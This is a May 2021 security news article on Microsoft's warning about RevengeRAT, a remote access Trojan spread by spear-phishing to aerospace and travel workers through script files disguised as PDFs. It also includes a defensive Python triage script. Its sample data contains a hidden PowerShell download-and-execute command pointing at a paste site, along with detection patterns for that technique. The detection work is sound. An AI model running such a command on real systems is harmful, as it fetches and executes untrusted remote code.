Microsoft Issues Warning for New RAT Targeting Industries

Microsoft Security Intelligence published a series of tweets warning of the spread of a new strain of malware that targets the aerospace and travel industries. The malware in question has been named RevengeRAT.

A RAT or a remote access Trojan is a type of malware that allows bad actors to gain considerable control over an infected system or network. RATs usually include a backdoor component that allows hackers to send commands and execute code on the victim system while staying undetected for as long as possible.

The new RevengeRAT, also called AsyncRAT, is being spread primarily through spear-phishing emails. Spear-phishing is the practice of sending malicious email disguised to look as though it came from a trusted source, usually someone the recipient already knows and trusts.

Unlike regular phishing where emails are sent in mass spam campaigns, spear-phishing tends to be a more narrowly targeted approach, focusing on a specific business, organization or entity.

The malicious emails spreading RevengeRAT carry an attachment masquerading as an Adobe PDF file; in reality it is a Visual Basic file laden with malicious script. Once the script is executed, it deploys the RAT payload. The attachment usually abuses legitimate web services and contains a link to the Visual Basic script file.

Security company Morphisec, quoted in Microsoft's tweets, named the loader used in the deployment of RevengeRAT "Snip3". A curious fact about the loader is that it skips the deployment of the remote access Trojan component entirely if it discovers that it is being executed within a Windows Sandbox or another virtual machine environment that can be used as a malware-catching sandbox.

RevengeRAT can exfiltrate login credentials, capture screenshots, access webcams and read clipboard contents.

Once the RAT has been deployed on the victim's system, it contacts its command and control server through a dynamic hosting site, then abuses PowerShell and fileless techniques to fetch and deploy three further payloads from public-facing links on sites such as Pastebin.
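The two stages described above, a script attachment disguised as a PDF and a fileless PowerShell download-and-execute from a public paste site, are the kind of thing a mail gateway or EDR rule can flag. The following triage heuristic is an added example, not code from Microsoft or Morphisec; the sample events, extension lists and scoring threshold are constructed assumptions for illustration.

```python
import re

# Constructed sample telemetry (mail-gateway attachment names and process
# command lines); illustrative only, not indicators from the real campaign.
SAMPLE_EVENTS = [
    {"type": "attachment", "name": "Flight_Itinerary.pdf.vbs"},
    {"type": "attachment", "name": "Quarterly_Report.pdf"},
    {"type": "process", "cmd": "powershell.exe -nop -w hidden -c \"IEX "
     "((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE'))\""},
    {"type": "process", "cmd": "powershell.exe -c Get-ChildItem C:\\Users"},
]

# A document-looking extension immediately followed by a Windows script-host
# extension, e.g. "x.pdf.vbs": the "PDF" the user sees is really a script.
DISGUISED_SCRIPT = re.compile(
    r"\.(pdf|docx?|xlsx?)\.(vbs|vbe|js|jse|wsf|hta|ps1)$", re.I)

# Fileless download-and-execute: a web fetch primitive plus in-memory execution,
# optionally pointed at a public paste service and launched with quiet flags.
FETCH = re.compile(r"DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b|Net\.WebClient", re.I)
EXEC_IN_MEMORY = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
PASTE_HOSTS = re.compile(r"https?://(?:www\.)?pastebin\.com/", re.I)  # extend as needed
LAUNCH_FLAGS = re.compile(r"-nop\b|-w(?:indowstyle)?\s+hidden|-enc(?:odedcommand)?\b", re.I)


def is_disguised_script(filename: str) -> bool:
    """True when a script extension hides behind a document extension."""
    return bool(DISGUISED_SCRIPT.search(filename))


def fileless_download_score(cmd: str) -> int:
    """Score a PowerShell command line 0..4; 3 or more merits analyst review."""
    if "powershell" not in cmd.lower():
        return 0
    return sum(1 for p in (FETCH, EXEC_IN_MEMORY, PASTE_HOSTS, LAUNCH_FLAGS) if p.search(cmd))


def triage(events):
    """Return (reason, event) pairs for events matching the described chain."""
    findings = []
    for ev in events:
        if ev["type"] == "attachment" and is_disguised_script(ev["name"]):
            findings.append(("script disguised as document", ev))
        elif ev["type"] == "process" and fileless_download_score(ev["cmd"]) >= 3:
            findings.append(("fileless PowerShell download-and-execute", ev))
    return findings


if __name__ == "__main__":
    for reason, ev in triage(SAMPLE_EVENTS):
        print(f"{reason}: {ev}")
```

The score is deliberately additive so that a legitimate admin script that fetches from an internal host with no in-memory execution stays below the threshold.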

According to Microsoft, the keywords and angle of the spear-phishing emails sent by the bad actors running the current RevengeRAT campaigns are all slanted towards workers in the travel and aerospace sectors.

The tweets further noted that Microsoft Defender can detect the separate components of this malware and react at every stage of the attack.

May 13, 2021
